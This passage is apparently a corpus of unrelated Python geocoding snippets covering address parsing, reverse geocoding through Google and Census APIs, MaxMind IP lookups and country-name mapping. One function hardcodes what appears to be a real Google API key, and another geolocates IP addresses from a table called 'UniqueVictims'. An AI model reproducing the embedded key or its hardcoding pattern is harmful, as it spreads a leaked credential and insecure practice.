value: {response[\"result\"]}') from e", "def county_to_zip(county: str, state: str, df: pd.DataFrame) -> list:\n\n if (type(county) == float or type(state) == float):\n return []\n\n county = county.strip()\n \n result = list(df.loc[(df['state'] == state) & (county == df['county'].str.replace(' County', '').str.replace(' City', '')), 'zip'])\n if (result == []):\n print(county + ', ' + state)\n\n return result", "def maxmind_geocode():\n reader = maxminddb.open_database('GeoLite2-City.mmdb')\n asn = maxminddb.open_database('GeoLite2-ASN.mmdb')\n\n unique_ips = session.query(UniqueVictims).all()\n\n for ip in unique_ips:\n try:\n current_ip = reader.get(ip.ip)\n asn_ip = asn.get(ip.ip)\n ip.lat = current_ip['location']['latitude']\n ip.long = current_ip['location']['longitude']\n if 'city' in current_ip:\n ip.city = current_ip['city']['names']['en']\n if 'country' in current_ip:\n ip.country = current_ip['country']['names']['en']\n if asn_ip:\n ip.isp = asn_ip['autonomous_system_organization']\n except TypeError:\n continue\n session.commit()", "def extract_zipcode(full_address):\n full_address = full_address.strip()\n last_space_index = full_address.rindex(\" \")\n zipcode = full_address[last_space_index + 1 : ]\n return zipcode", "def city_country(city, country):\n return(city + ', ' + country)", "def get_city_country(city, country, population=''):\n if population:\n location = city + ' ' + country + ' ' + str(population)\n return location.title()\n\n else:\n location = city + ' ' + country\n return location.title()", "def test_city_country(self):\n\t\tformatted_address = city_country('santiago', 'chile')\n\t\tself.assertEqual(formatted_address, 'Santiago, Chile')", "def return_city(n):\n if n == 1:\n return \"San Francisco\"\n elif n == 2:\n return \"Los Angeles\"\n elif n == 3:\n return \"Las Vegas\"\n elif n == 4:\n return \"Portland\"\n elif n == 5:\n return \"San Diego\"\n else:\n return \"Seattle\"", "def country(alpha_2_code: str) -> None:", "def coordinates(latitude, longitude):\r\n location = geolocator.reverse(latitude + \", \" + longitude)\r\n data = location.raw\r\n data = data['address']\r\n state_code = data['state']\r\n return state_code", "def maploc(loc):\n\n\n loc = REGEX['parens'].sub('', loc)\n loc = REGEX['and'].sub('', loc)\n loc = REGEX['num'].sub('', loc)\n\n \"\"\"\n 'parens' 'and' 'single' 'num' 'seeley' 'iab' 'brh'\n \"\"\"\n \"\"\"\n /* For non-street address, strip room numbers */\n if (!location.match(' Ave')) {\n location = location.replace(/LL[0-9]/g, '').replace(/[0-9]/g, '');\n }\n /* Some text substitutions */\n location = location.replace('Seeley W.', '').replace('International Affairs Building', '420 W 118th St').replace('Broadway Residence Hall', '2900 Broadway');\n\n \"\"\"\n return loc + ', New York, NY 10027'", "def return_address_from_location(location='0,0'):\n if not re.compile('^(\\-?\\d+(\\.\\d+)?),\\s*(\\-?\\d+(\\.\\d+)?)$').match(location):\n raise ValueError('Location Invalid')\n base_url = 'https://maps.googleapis.com/maps/api/geocode/json?'\n latlng = 'latlng=' + location\n try:\n #This try block is for our first 150,000 requests. 
If we exceed this, use Jack's Token.\n key_string = '&key=' + ACCESS_TOKEN\n url = base_url + latlng + key_string #Builds the url\n result = requests.get(url).json() #Gets google maps json file\n cleaned = result['results'][0]['address_components']\n #Address to check against value of check_against_business_location\n chk = cleaned[0]['long_name'] + ' ' + cleaned[1]['long_name'] + ', ' + cleaned[3]['long_name']\n business_tuple = check_against_business_location(location, chk)\n if business_tuple[0]: #If true, the lat, lon matches a business location and we return business name\n return business_tuple[1]\n else: #otherwise, we just return the address\n return cleaned[0]['long_name'] + ' ' + cleaned[1]['short_name'] + ', ' + cleaned[3]['short_name']\n except:\n try:\n #Use Jack's Token in case of some invalid request problem with other API Token\n key_string = '&key=' + JACK_TOKEN\n url = base_url + latlng + key_string #Builds the url\n result = requests.get(url).json() #Gets google maps json file\n cleaned = result['results'][0]['address_components']\n #Address to check against value of check_against_business_location\n chk = cleaned[0]['long_name'] + ' ' + cleaned[1]['long_name'] + ', ' + cleaned[3]['long_name']\n business_tuple = check_against_business_location(location, chk)\n if business_tuple[0]: #If true, the lat, lon matches a business location and we return business name\n return business_tuple[1]\n else: #otherwise, we just return the address\n return cleaned[0]['long_name'] + ' ' + cleaned[1]['short_name'] + ', ' + cleaned[3]['short_name']\n except:\n raise ValueError(\"Something went wrong\")", "def extract_city(full_address):\n full_address = full_address.strip()\n last_comma_index = full_address.rindex(\",\")\n mid_comma_index = full_address.rindex(\",\", 0, last_comma_index)\n city = full_address[mid_comma_index + 1 : last_comma_index]\n city = city.strip()\n return city", "def test_get_country_by_geo_location(self):\n pass", "def geocode(address, key=GOOGLE_KEY):\n\n geo = GoogleV3(key)\n\n try:\n loc = geo.geocode(address, exactly_one=True)\n if loc.raw.get('partial_match'):\n return None\n\n tz = geo.timezone((loc.latitude, loc.longitude))\n tz = tz.localize(datetime.now())\n tz = tz.strftime('%Z')\n\n return {'lng': loc.longitude, 'lat': loc.latitude, 'tz': tz}\n except AttributeError:\n return None\n except:\n raise IOError('error contacting google geocode')", "def geocode(location):\n geocoding_url = f'https://maps.googleapis.com/maps/api/geocode/json?' 
\\\n f'address={location}&key={_GEOCODING_KEY}'\n geocode_data = requests.get(geocoding_url).json()\n return geocode_data", "def geotransform(street_address_column, borough_column, zip_code_column, in_csv_file_loc, out_csv_file_loc):\r\n with open(out_csv_file_loc, 'wb') as csv_new_file:\r\n fieldnames = ['2010 Census Block',\r\n '2010 Census Block Suffix',\r\n '2010 Census Tract',\r\n 'Assembly District',\r\n 'Atomic Polygon',\r\n 'B10SC First Borough and Street Code',\r\n 'Bike Lane',\r\n 'Borough Block Lot (BBL)',\r\n 'Building Identification Number (BIN) of Input Address or NAP',\r\n 'City Council District',\r\n 'Community District',\r\n 'Community School District',\r\n 'Congressional District',\r\n 'DSNY Snow Priority Code',\r\n 'Election District',\r\n 'First Borough Name',\r\n 'House Number Display Format',\r\n 'House Number Sort Format',\r\n 'Hurricane Evacuation Zone (HEZ)',\r\n 'Message',\r\n 'NTA Name',\r\n 'Neighborhood Tabulation Area (NTA)',\r\n 'Police Precinct',\r\n 'Roadway Type',\r\n 'Second Street Name Normalized',\r\n 'Spatial Coordinates of Segment',\r\n 'State Senatorial District',\r\n 'USPS Preferred City Name',\r\n 'X-Y Coordinates of Lot Centroid',\r\n 'Zip Code',\r\n 'Latitude',\r\n 'Longitude',\r\n 'Spatial X',\r\n 'Spatial Y']\r\n writer = csv.DictWriter(csv_new_file, fieldnames=fieldnames)\r\n writer.writeheader()\r\n \r\n with open(in_csv_file_loc, 'rb') as csvfile:\r\n csvreader = csv.DictReader(csvfile, delimiter = ',')\r\n for row in csvreader:\r\n full_address = row[street_address_column].strip()\r\n split_full_address = full_address.split(' ')\r\n house_number = split_full_address[0]\r\n borough = row[borough_column].strip()\r\n boro_code = borough_transform(borough)\r\n zip_code = row[zip_code_column].strip()\r\n street_name = ' '.join(split_full_address[1:])\r\n \r\n (wa1, wa2) = geo_coder(house_number, boro_code, street_name, zip_code)\r\n \r\n output = Parser(wa1, wa2)\r\n \r\n writer.writerow(output)", "def city_state_zip(**kwargs):\r\n result = \"{city_name}, {state_code}\".format(**kwargs)\r\n if kwargs[\"five_digit_zip_code\"]:\r\n # RLID for some reason has two spaces between state & ZIP.\r\n result += \" {five_digit_zip_code}\".format(**kwargs)\r\n return result", "def reverse_lookup(lat, long, key=keys.google):\n result = str(Geocoder(api_key=key).reverse_geocode(lat, long))\n location_details = result.split(\",\")\n address = location_details[0]\n zipcode = location_details[-2][-5:]\n city = location_details[1]\n state = location_details[2].split(\" \")[1]\n return address, zipcode, city, state", "def geocode():\n\n if \"location\" in request.vars:\n location = request.vars.location\n else:\n session.error = T(\"Need to specify a location to search for.\")\n redirect(URL(r=request, f=\"index\"))\n\n if \"service\" in request.vars:\n service = request.vars.service\n else:\n # @ToDo: service=all should be default\n service = \"google\"\n\n if service == \"google\":\n return s3base.GoogleGeocoder(location, db).get_kml()\n\n if service == \"yahoo\":\n return s3base.YahooGeocoder(location, db).get_xml()", "def get_coord_from_address(code_postal, adresse=None):\n headers = {\"Content-Type\": \"application/json\"}\n if adresse != None:\n url = str((\"http://api-adresse.data.gouv.fr/search/?q=\" + str(adresse) + \"&postcode=\" + str(code_postal)))\n else:\n url = str((\"http://api-adresse.data.gouv.fr/search/?q=\" + str(code_postal)))\n print(url)\n r = requests.get(url, headers=headers, data=\"\")\n js = json.loads(r.text)\n if code_postal == 
75001:\n x = js['features'][1]['geometry']['coordinates']\n else:\n \tx = js['features'][0]['geometry']['coordinates']\n longitude = x[0]\n latitude = x[1]\n pos = []\n pos.append(longitude)\n pos.append(latitude)\n print(pos)\n return pos", "def get_airport_start_end(result, geo_airport_cities):\n crs={'init': 'epsg:4326'}\n geometry_st = [Point(xy) for xy in zip(result.start_lon, result.start_lat)]\n geometry_end = [Point(xy) for xy in zip(result.end_lon, result.end_lat)]\n geo_st = gpd.GeoDataFrame(geometry_st, crs=crs, geometry=geometry_st)[['geometry']]\n geo_end = gpd.GeoDataFrame(geometry_end, crs=crs, geometry=geometry_end)[['geometry']]\n geo_st.crs = crs\n geo_end.crs = crs\n st_airport = pd.DataFrame(geo_st.within(geo_airport_cities['geometry'].unary_union.buffer(0.1)))\n st_airport.index=result.index\n result['geometry_st'] = st_airport\n end_airport = pd.DataFrame(geo_end.within(geo_airport_cities['geometry'].unary_union.buffer(0.1)))\n end_airport.index=result.index\n result['geometry_end'] = end_airport\n st_florence = pd.DataFrame(geo_st.within(geo_airport_cities['geometry'].loc[1].buffer(0.1)))\n st_florence.index=result.index\n result['geometry_st_fl'] = st_florence\n end_florence = pd.DataFrame(geo_end.within(geo_airport_cities['geometry'].loc[1].buffer(0.1)))\n end_florence.index=result.index\n result['geometry_end_fl'] = end_florence\n st_pisa = pd.DataFrame(geo_st.within(geo_airport_cities['geometry'].loc[0].buffer(0.1)))\n st_pisa.index=result.index\n result['geometry_st_pisa'] = st_pisa\n end_pisa = pd.DataFrame(geo_end.within(geo_airport_cities['geometry'].loc[0].buffer(0.1)))\n end_pisa.index=result.index\n result['geometry_end_pisa'] = end_pisa\n return result", "def suggestions(self, input, borough_code=None):\n parsed = parser.address(input)\n if borough_code:\n parsed['BOROUGH_CODE'] = borough_code\n self.similiar_names = []\n self.results = []\n if parsed['PHN'] and parsed['STREET']:\n if not parsed['BOROUGH_CODE'] and not parsed['ZIP']:\n # iterate borocodes\n for x in range(1, 6):\n self._geocode(phn=parsed['PHN'], street=parsed['STREET'], borough_code=x)\n # try address with borough code if present\n elif parsed['BOROUGH_CODE']:\n self._geocode(phn=parsed['PHN'], street=parsed['STREET'], borough_code=parsed['BOROUGH_CODE'])\n # try address with zip code if present\n elif parsed['ZIP']:\n self._geocode(phn=parsed['PHN'], street=parsed['STREET'], zip=parsed['ZIP'])\n # validate and retrieve any addresses\n if len(self.similiar_names):\n for name in self.similiar_names:\n self._geocode(phn=parsed['PHN'], street=name['street'], borough_code=name['borough_code'])\n if None in self.results:\n self.results = list(filter(lambda v: v is not None, self.results))\n\n return self.results", "def transform(self):\n print(\"Add City, State\")\n geocoder_prefix_url = self.config_dict.get('geocoder_prefix_url')\n geocoder_suffix_url = self.config_dict.get('geocoder_suffix_url')\n transformed_file = open(f\"{self.config_dict.get('proj_dir')}new_addresses.csv\", \"w\")\n transformed_file.write(\"X,Y,Type\\n\")\n with open(f\"{self.config_dict.get('proj_dir')}addresses.csv\", \"r\") as partial_file:\n csv_dict = csv.DictReader(partial_file, delimiter=',')\n for row in csv_dict:\n address = row[\"Street Address\"] + \" Boulder CO\"\n print(address)\n geocode_url = f\"{geocoder_prefix_url}{address}{geocoder_suffix_url}\"\n print(geocode_url)\n r = requests.get(geocode_url)\n\n resp_dist = r.json()\n x = resp_dist['result']['addressMatches'][0]['coordinates']['x']\n y = 
resp_dist['result']['addressMatches'][0]['coordinates']['y']\n transformed_file.write(f\"{x},{y}, Residential\\n\")\n\n transformed_file.close()", "def get_countries_geo_df() -> geopandas.GeoDataFrame:\n\n geo_df: geopandas.GeoDataFrame = geopandas.read_file(\n GEO_DATA_DIR / \"ne_110m_admin_0_map_units\" / \"ne_110m_admin_0_map_units.shp\"\n )\n\n geo_df = geo_df.rename(columns={\"ADMIN\": CODE}, errors=\"raise\")\n\n # Keys are what's in the geo df, values are what we want to rename them to\n # Values must match the names in the original data source. If you don't like those\n # names, change them there and then come back and change the values here.\n geo_df[CODE] = (\n geo_df[CODE]\n .map(\n {\n \"Central African Republic\": \"Central African Rep.\",\n \"Democratic Republic of the Congo\": \"Dem. Rep. Congo\",\n \"Equatorial Guinea\": \"Eq. Guinea\",\n \"eSwatini\": \"Eswatini\",\n \"Georgia (Country)\": \"Georgia\",\n \"Republic of Serbia\": \"Serbia\",\n \"United Arab Emirates\": \"UAE\",\n \"United Kingdom\": \"Britain\",\n \"United Republic of Tanzania\": \"Tanzania\",\n \"Western Sahara\": \"W. Sahara\",\n \"United States of America\": \"United States\",\n }\n )\n .fillna(geo_df[CODE])\n )\n geo_df = geo_df[geo_df[CODE] != \"Antarctica\"]\n\n colonial_power_main_countries = {\n \"Britain\": \"England\",\n \"France\": \"France, Metropolitan\",\n \"Norway\": \"Norway\",\n \"Papua New Guinea\": \"Papua New Guinea\",\n }\n\n is_main_country_idx = geo_df[CODE].map(colonial_power_main_countries).isna() | (\n geo_df[\"NAME_SORT\"] == geo_df[CODE].map(colonial_power_main_countries)\n )\n\n geo_df[CODE] = geo_df[CODE].where(\n is_main_country_idx, geo_df[CODE].str.cat(geo_df[\"NAME_SORT\"], sep=\" - \"),\n )\n geo_df[\"name\"] = geo_df[CODE]\n\n geo_df = geo_df[\n [\n \"featurecla\",\n \"scalerank\",\n \"LABELRANK\",\n # \"SOVEREIGNT\",\n # \"SOV_A3\",\n # \"ADM0_DIF\",\n \"LEVEL\",\n # \"TYPE\",\n CODE,\n \"name\",\n # \"ADM0_A3\",\n # \"GEOU_DIF\",\n # \"GEOUNIT\",\n # \"GU_A3\",\n # \"SU_DIF\",\n # \"SUBUNIT\",\n # \"SU_A3\",\n # \"BRK_DIFF\",\n # \"NAME\",\n # \"NAME_LONG\",\n # \"BRK_A3\",\n # \"BRK_NAME\",\n # \"BRK_GROUP\",\n \"ABBREV\",\n # \"POSTAL\",\n # \"FORMAL_EN\",\n # \"FORMAL_FR\",\n # \"NAME_CIAWF\",\n # \"NOTE_ADM0\",\n # \"NOTE_BRK\",\n \"NAME_SORT\",\n # \"NAME_ALT\",\n # \"MAPCOLOR7\",\n # \"MAPCOLOR8\",\n # \"MAPCOLOR9\",\n # \"MAPCOLOR13\",\n # \"POP_EST\",\n # \"POP_RANK\",\n # \"GDP_MD_EST\",\n # \"POP_YEAR\",\n # \"LASTCENSUS\",\n # \"GDP_YEAR\",\n \"ECONOMY\",\n \"INCOME_GRP\",\n # \"WIKIPEDIA\",\n # \"FIPS_10_\",\n # \"ISO_A2\",\n # \"ISO_A3\",\n # \"ISO_A3_EH\",\n # \"ISO_N3\",\n # \"UN_A3\",\n # \"WB_A2\",\n # \"WB_A3\",\n # \"WOE_ID\",\n # \"WOE_ID_EH\",\n # \"WOE_NOTE\",\n # \"ADM0_A3_IS\",\n # \"ADM0_A3_US\",\n # \"ADM0_A3_UN\",\n # \"ADM0_A3_WB\",\n \"CONTINENT\",\n \"REGION_UN\",\n \"SUBREGION\",\n \"REGION_WB\",\n # \"NAME_LEN\",\n # \"LONG_LEN\",\n # \"ABBREV_LEN\",\n # \"TINY\",\n # \"HOMEPART\",\n # \"MIN_ZOOM\",\n # \"MIN_LABEL\",\n # \"MAX_LABEL\",\n # \"NE_ID\",\n # \"WIKIDATAID\",\n # \"NAME_AR\",\n # \"NAME_BN\",\n # \"NAME_DE\",\n # \"NAME_EN\",\n # \"NAME_ES\",\n # \"NAME_FR\",\n # \"NAME_EL\",\n # \"NAME_HI\",\n # \"NAME_HU\",\n # \"NAME_ID\",\n # \"NAME_IT\",\n # \"NAME_JA\",\n # \"NAME_KO\",\n # \"NAME_NL\",\n # \"NAME_PL\",\n # \"NAME_PT\",\n # \"NAME_RU\",\n # \"NAME_SV\",\n # \"NAME_TR\",\n # \"NAME_VI\",\n # \"NAME_ZH\",\n \"geometry\",\n ]\n ]\n\n return geo_df", "def city_country(city, country):\n full_city = city + \", \" + country\n 
return full_city.title()", "def placeToRoad(placeName):\n # sleep(2)\n g = gmaps.geocode(placeName)\n roadNo, roadName = '', ''\n zipCode, coor_Lat, coor_Lng = None, None, None\n if len(g) > 0:\n for ac in g[0]['address_components']:\n if ac['types'] and len(ac['types']) > 0:\n if ac['types'][0] == 'street_number':\n try:\n roadNo = ac['long_name']\n except:\n roadNo = ''\n if ac['types'][0] == 'route':\n try:\n roadName = ac['long_name']\n except:\n roadName = ''\n if ac['types'][0] == 'postal_code':\n try:\n zipCode = ac['long_name']\n except:\n zipCode = None\n\n # if 'long_name' in g[0]['address_components'][0].keys(): # road no.\n # if g[0]['address_components'][0]['types'][0] == 'street_number':\n # try:\n # roadNo = g[0]['address_components'][0]['long_name']\n # except:\n # roadNo = ''\n #\n # if 'long_name' in g[0]['address_components'][1].keys(): # road name\n # if g[0]['address_components'][1]['types'][0] == 'route':\n # try:\n # roadName = g[0]['address_components'][1]['long_name']\n # except:\n # roadName = ''\n #\n # if 'long_name' in g[0]['address_components'][-1].keys(): # zip code\n # if g[0]['address_components'][-1]['types'][0] == 'postal_code':\n # try:\n # zipCode = g[0]['address_components'][-1]['long_name']\n # except:\n # zipCode = None\n\n if 'location' in g[0]['geometry'].keys():\n try:\n coor = g[0]['geometry']['location'] # APPROXIMATE location\n coor_Lat = coor['lat']\n coor_Lng = coor['lng']\n except:\n coor_Lat, coor_Lng = None, None\n\n roadName = roadNo + ' ' + roadName\n coor = (coor_Lat, coor_Lng)\n return roadName, zipCode, coor", "def get_geocode(self, address):\n\n try:\n raw_data = self.__get_raw_data(address)\n except (URLError, ValueError):\n return 503, None\n else:\n code, coords = self.__parse_raw_data(raw_data)\n return code, coords", "def country_code_update(df):\n from pycountry import countries as ct\n new_df = country_grouping(df)\n # country names in the data set that are not fit ISO standard\n completion = pd.DataFrame(np.array([['Bolivia', 'BO'],\n ['Brunei', 'BN'],\n ['Congo (Brazzaville)', 'CG'],\n ['Congo (Kinshasa)', 'CD'],\n ['Cote d\\'Ivoire', 'CI'],\n ['Holy See', 'VA'],\n ['Iran', 'IR'],\n ['Korea, South', 'KR'],\n ['Moldova', 'MD'],\n ['Russia', 'RU'],\n ['Taiwan*', 'TW'],\n ['Tanzania', 'TZ'],\n ['US', 'US'],\n ['Venezuela', 'VE'],\n ['Vietnam', 'VN'],\n ['Syria', 'SY'],\n ['Laos', 'LA'],\n ['West Bank and Gaza', 'PS'],\n ['Kosovo', 'XK'],\n ['Burma', 'MM']\n ]),\n columns=['c_name', 'c_code']\n )\n country_code_list = []\n for country_name in new_df['Country/Region']:\n try:\n if country_name in completion['c_name'].tolist():\n # print('exception covered: ', country_name)\n country_code = completion['c_code'].loc[completion['c_name'] == country_name].item()\n # identifies the cruise ships in the data set considered as a 'country'\n elif country_name == 'Diamond Princess' or country_name == 'MS Zaandam':\n country_code = 'Cruise Ship'\n else:\n country_code = ct.get(name=country_name).alpha_2\n except KeyError:\n print('no result: ', country_name)\n country_code = 'None'\n pass\n country_code_list.append(country_code)\n # print(country_code_list)\n new_df.insert(0, \"country_code\", country_code_list, True)\n new_df = new_df.drop(columns='Country/Region')\n unknown_index = new_df[new_df['country_code'] == 'Cruise Ship'].index\n new_df.drop(unknown_index, inplace=True) # drop when country_code = 'None', most likely are Cruise ships\n # new_df.set_index(new_df['country_code'])\n return new_df", "def get_location(coordinates):\n 
location_info = gmaps.reverse_geocode(latlng=coordinates)\n location_list = list()\n for location in location_info:\n if \"locality\" in location[\"types\"]:\n return location[\"formatted_address\"]\n # location_list.append(location[\"formatted_address\"])\n # return location_list", "def _geocode(self, address):\n try:\n g = self.geocoder_class()\n address = smart_str(address)\n result = g.geocode(address, exactly_one=False)\n if result:\n return result[0]\n else:\n raise GeocodeFailed()\n except (UnboundLocalError, ValueError, GeocoderServiceError) as e:\n raise Exception(e)", "def get_coordinates(table, replace_columns=False, remove_nans=False):\n assert \"zip code\" in table.labels or ((\"city\" in table.labels or \"county\" in table.labels) and \"state\" in table.labels)\n ref = Table.read_table(pkg_resources.resource_filename(__name__, \"geodata/geocode_states.csv\"))\n\n index_name = \"\".join(table.labels) # Ensures that index can't possibly be one of the preexisting columns\n index_name += \" \"\n \n table = table.with_columns(index_name, np.arange(table.num_rows))\n lat = np.array([np.nan] * table.num_rows)\n lon = np.array([np.nan] * table.num_rows)\n unassigned = set(range(table.num_rows)) \n while len(unassigned) > 0:\n index = unassigned.pop()\n row = table.take(index).take(0)\n if \"zip code\" in table.labels:\n select = table.where(\"zip code\", row[\"zip code\"][0]).column(index_name)\n unassigned -= set(select)\n try:\n ref_lat, ref_lon = ref.where(\"zip\", int(row[\"zip code\"][0])).select(\"lat\", \"lon\").row(0)\n lat[select] = ref_lat\n lon[select] = ref_lon\n except IndexError:\n pass\n else:\n state_select = table.where(\"state\", row[\"state\"][0]).column(index_name)\n county_select = table.where(\"county\", row[\"county\"][0]).column(index_name) if \"county\" in table.labels else np.arange(table.num_rows)\n city_select = table.where(\"city\", row[\"city\"][0]).column(index_name) if \"city\" in table.labels else np.arange(table.num_rows)\n select = set.intersection(set(state_select), set(county_select), set(city_select))\n unassigned -= select\n select = list(select)\n try:\n matched_ref = ref.where(\"state\", row[\"state\"][0])\n if \"county\" in table.labels:\n matched_ref = matched_ref.where(\"county\", row[\"county\"][0].lower())\n if \"city\" in table.labels:\n matched_ref = matched_ref.where(\"city\", row[\"city\"][0].lower())\n ref_lat, ref_lon = matched_ref.select(\"lat\", \"lon\").row(0)\n lat[select] = ref_lat\n lon[select] = ref_lon\n except IndexError:\n pass\n table = table.with_columns(\"lat\", lat, \"lon\", lon)\n table = table.drop(index_name)\n if replace_columns:\n for label in [\"county\", \"city\", \"zip code\", \"state\"]:\n try:\n table = table.drop(label)\n except KeyError:\n pass\n if remove_nans: \n table = table.where(\"lat\", are.below(float(\"inf\"))) # NaNs are not considered to be smaller than infinity\n return table", "def lookup(addr, num, street, city, code, geo_dict, failure_set):\n try:\n address_url = \"https://geocoding.geo.census.gov/geocoder/locations/address?\" + \\\n \"street=\" + str(num) + \"+\" + street.replace(\" \", \"+\") + \"&city=\" + city + \"&zip=\" + \\\n str(code) + \"&benchmark=9&format=json\"\n geo_data = json.load(req.urlopen(address_url).decode('utf-8'))['result']\n except Exception:\n try:\n address_url = \"https://geocoding.geo.census.gov/geocoder/locations/address?\" + \\\n \"street=\" + str(num) + \"+\" + street.replace(\" \", \"+\") + \"&city=\" + city + \"&zip=\" + \\\n str(code) + 
\"&benchmark=9&format=json\"\n geo_data = json.loads(req.urlopen(address_url).read().decode('utf-8'))['result']\n except Exception as e:\n print(e, addr)\n failure_set.add(addr)\n return None\n if len(geo_data['addressMatches']) == 0:\n print(addr, ': Failure')\n failure_set.add(addr)\n return None\n print(addr, ': Success')\n location = geo_data['addressMatches'][0]['coordinates']\n latlong = ','.join([str(location['y']), str(location['x'])])\n geo_dict[addr] = latlong\n return tuple(float(geo) for geo in latlong.split(','))", "def get_apartment_latlng(self, soup, apartment_dict):\n import googlemaps\n from datetime import datetime\n\n gmaps = googlemaps.Client(key='AIzaSyBxV4EAXU1aMLGU9bnokygGL92c2BxDzCE')\n\n # Geocoding an address\n geocode_result = gmaps.geocode(apartment_dict['address'])\n\n if len(geocode_result) > 0:\n # Store lat and lng\n apartment_dict['lat'] = geocode_result[0]['geometry']['location']['lat']\n apartment_dict['lng'] = geocode_result[0]['geometry']['location']['lng']\n else:\n print(\"Failed to find lat and lng values\")", "def city_country(city, country):\n return city.title() + \", \" + country.title()", "def city_country(city, country):\n place = f\"{city}, {country}\"\n return place.title()", "def city_country(city_name, country_name):\n city_country_combo = city_name + ', ' + country_name\n return city_country_combo.title()", "def reverse_geocoding(lat, lng, API_KEY=API_KEY, GEOCODE_API_URL=GEOCODE_API_URL):\n params = {\n 'latlng': '{},{}'.format(lat, lng),\n 'key': API_KEY\n }\n\n # Do the request and get the response data\n response = requests.get(GEOCODE_API_URL, params=params)\n response = response.json()\n geodata = parse_response(response)\n return geodata", "def _derive_country_IE(place):\n derived = []\n if _COUNTY_REGEX.search(place.name):\n stripped = _COUNTY_REGEX.sub(\"\", place.name.lower())\n derived += [\"co \" + stripped, \"county \" + stripped]\n\n #\n # Alternative name cases that aren't as straightforward as the above.\n #\n try:\n derived += {\n \"loch garman\": [\"co wexford\"],\n \"uíbh fhailí\": [\"co offaly\"],\n \"maigh eo\": [\"co mayo\"],\n \"an iarmhí\": [\"co westmeath\"],\n }[place.name.lower()]\n except KeyError:\n pass\n\n return [DerivedName(text, \"en\") for text in derived]", "def shiftGeocodesUp(geocode_geounitNode):\n geounitNode = geocode_geounitNode[1]\n geounitNode.geocode = geounitNode.parentGeocode\n geounitNode.setParentGeocode()\n geounitNode.setGeolevel()\n return geounitNode", "def Get_LonghurstProvinceName4Num(input):\n LonghurstProvinceDict = {\n 'ALSK': 'AlaskaDownwellingCoastalProvince',\n 'ANTA': 'AntarcticProvince',\n 'APLR': 'AustralPolarProvince',\n 'ARAB': 'NWArabianUpwellingProvince',\n 'ARCH': 'ArchipelagicDeepBasinsProvince',\n 'ARCT': 'AtlanticArcticProvince',\n 'AUSE': 'EastAustralianCoastalProvince',\n 'AUSW': 'AustraliaIndonesiaCoastalProvince',\n 'BENG': 'BenguelaCurrentCoastalProvince',\n 'BERS': 'N.PacificEpicontinentalProvince',\n 'BPLR': 'BorealPolarProvince(POLR)',\n 'BRAZ': 'BrazilCurrentCoastalProvince',\n 'CAMR': 'CentralAmericanCoastalProvince',\n 'CARB': 'CaribbeanProvince',\n 'CCAL': 'CaliforniaUpwellingCoastalProvince',\n 'CHIL': 'ChilePeruCurrentCoastalProvince',\n 'CHIN': 'ChinaSeaCoastalProvince',\n 'CHSB': 'CheasapeakeBayProvince',\n 'CNRY': 'CanaryCoastalProvince(EACB)',\n 'EAFR': 'E.AfricaCoastalProvince',\n 'ETRA': 'EasternTropicalAtlanticProvince',\n 'FKLD': 'SWAtlanticShelvesProvince',\n 'GFST': 'GulfStreamProvince',\n 'GUIA': 'GuianasCoastalProvince',\n 'GUIN': 
'GuineaCurrentCoastalProvince',\n 'INDE': 'E.IndiaCoastalProvince',\n 'INDW': 'W.IndiaCoastalProvince',\n 'ISSG': 'IndianS.SubtropicalGyreProvince',\n 'KURO': 'KuroshioCurrentProvince',\n 'LAKE': 'CaspianSea,AralSea',\n 'MEDI': 'MediterraneanSea,BlackSeaProvince',\n 'MONS': 'IndianMonsoonGyresProvince',\n 'NADR': 'N.AtlanticDriftProvince(WWDR)',\n 'NASE': 'N.AtlanticSubtropicalGyralProvince(East)(STGE)',\n 'NASW': 'N.AtlanticSubtropicalGyralProvince(West)(STGW)',\n 'NATR': 'N.AtlanticTropicalGyralProvince(TRPG)',\n 'NECS': 'NEAtlanticShelvesProvince',\n 'NEWZ': 'NewZealandCoastalProvince',\n 'NPPF': 'N.PacificPolarFrontProvince',\n 'NPSE': 'N.PacificSubtropicalGyreProvince(East)',\n 'NPSW': 'N.PacificSubtropicalGyreProvince(West)',\n 'NPTG': 'N.PacificTropicalGyreProvince',\n 'NWCS': 'NWAtlanticShelvesProvince',\n 'OCAL': 'OffshoreCaliforniaCurrentProvince',\n 'PEQD': 'PacificEquatorialDivergenceProvince',\n 'PNEC': 'N.PacificEquatorialCountercurrentProvince',\n 'PSAE': 'PacificSubarcticGyresProvince(East)',\n 'PSAW': 'PacificSubarcticGyresProvince(West)',\n 'REDS': 'RedSea,PersianGulfProvince',\n 'SANT': 'SubantarcticProvince',\n 'SARC': 'AtlanticSubarcticProvince',\n 'SATL': 'SouthAtlanticGyralProvince(SATG)',\n 'SPSG': 'S.PacificSubtropicalGyreProvince',\n 'SSTC': 'S.SubtropicalConvergenceProvince',\n 'SUND': 'SundaArafuraShelvesProvince',\n 'TASM': 'TasmanSeaProvince',\n 'WARM': 'W.PacificWarmPoolProvince',\n 'WTRA': 'WesternTropicalAtlanticProvince'\n }\n return LonghurstProvinceDict[input]", "def get_lat_lon_from_arcGIS(cities, nworkers=20):\n print(\"get city lat and long from arcGIS\")\n # if len(cities) > 1000:\n # raise Exception(\n # \"Can only fetch up to 1000 lat/long per day from arcGIS\")\n nominatum = Nominatim()\n\n @retry(5)\n def geocoder(nominatum, city):\n notfound = {\n 'City, State/Country': city, 'latitude': None, 'longitude': None}\n loc = nominatum.geocode(city)\n if not loc:\n print(\"SKIPPING %s due to %s\" % (city, \"it being unrecognized\"))\n return notfound\n elif isinstance(loc, Exception):\n print(\"SKIPPING %s due to %s\" % (city, loc))\n return notfound\n else:\n return {'City, State/Country': city,\n 'latitude': loc[1][0],\n 'longitude': loc[1][1]}\n\n _lat_lon = []\n with concurrent.futures.ThreadPoolExecutor(max_workers=nworkers) as executor:\n for city in cities:\n executor\\\n .submit(geocoder, nominatum, city)\\\n .add_done_callback(receives_future(False)(_lat_lon.append))\n\n lat_lon = pd.DataFrame(_lat_lon)\n return lat_lon", "def city_country(city, country):\n return(city.title() + \", \" + country.title())", "def fix_location(r):\n \n # all is fine: just change zipcode datatype to str\n if not np.isnan(r['zip']) and not np.isnan(r['lat']):\n return [str(int(r['zip'])), r['lng'], r['lat']]\n \n # try to locate within zipcode polygons\n if not np.isnan(r['lat']):\n query = \"\"\"\n SELECT t.geoid as zip, {} as lng, {} as lat\n FROM us_zcta5 t JOIN usps_zcta5 z ON t.geoid = z.zip\n WHERE ST_Contains(t.shape, ST_GeomFromText('POINT({} {})', 2))\n \"\"\"\n res = pd.read_sql(query.format(r['lng'], r['lat'], r['lng'], r['lat']), con = con)\n if len(res) == 1:\n return res.values[0].tolist()\n\n # use zipcode center as location proxy: 